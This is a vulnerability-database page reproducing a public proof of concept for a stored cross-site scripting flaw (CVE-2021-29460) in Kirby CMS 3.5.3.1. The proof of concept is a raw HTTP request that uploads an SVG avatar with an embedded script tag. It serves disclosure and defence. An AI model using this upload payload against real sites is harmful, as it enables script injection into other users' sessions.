Vulners
Lucene search
Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)
🗓️ 28 Apr 2021 00:00:00Reported by Sreenath RaghunathanType 
exploitdb🔗 www.exploit-db.com👁 958 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Kirby CMS 3.5.3.1 - (file) Cross-Site Scripting Vulnerability | 28 Apr 202100:00 | – | zdt |
 | CVE-2021-29460 | 28 Apr 202114:05 | – | circl |
 | Kirby 跨站脚本漏洞 | 27 Apr 202100:00 | – | cnnvd |
 | CVE-2021-29460 | 27 Apr 202120:10 | – | cve |
 | CVE-2021-29460 Cross-site scripting (XSS) from unsanitized uploaded SVG files | 27 Apr 202120:10 | – | cvelist |
 | EUVD-2021-0862 | 7 Oct 202500:30 | – | euvd |
 | Cross-site scripting (XSS) from unsanitized uploaded SVG files in Kirby | 30 Apr 202117:30 | – | github |
 | CVE-2021-29460 | 27 Apr 202120:15 | – | nvd |
 | GHSA-QGP4-5QX6-548G Cross-site scripting (XSS) from unsanitized uploaded SVG files in Kirby | 30 Apr 202117:30 | – | osv |
 | Kirby CMS 3.5.3.1 Cross Site Scripting | 28 Apr 202100:00 | – | packetstorm |
10
# Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)
# Date: 21-04-2021
# Exploit Author: Sreenath Raghunathan
# Vendor Homepage: https://getkirby.com/
# Software Link: https://github.com/getkirby/kirby
# Version: 3.5.3.1(REQUIRED)
# CVE : CVE-2021-29460
POST /api/users/<userid>/avatar HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF: <redacted>
Content-Type: multipart/form-data;
boundary=---------------------------286121627839893676321700902916
Content-Length: 563
Connection: close
Cookie:
<redacted>
-----------------------------286121627839893676321700902916
Content-Disposition: form-data; name="file"; filename="svgxss.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,500 500,0" fill="#009900"
stroke="#004400"/>
"><script>alert(1)</script>
</svg>
-----------------------------286121627839893676321700902916--Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Apr 2021 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
CVSS 3.15.4 - 7.6
EPSS0.0112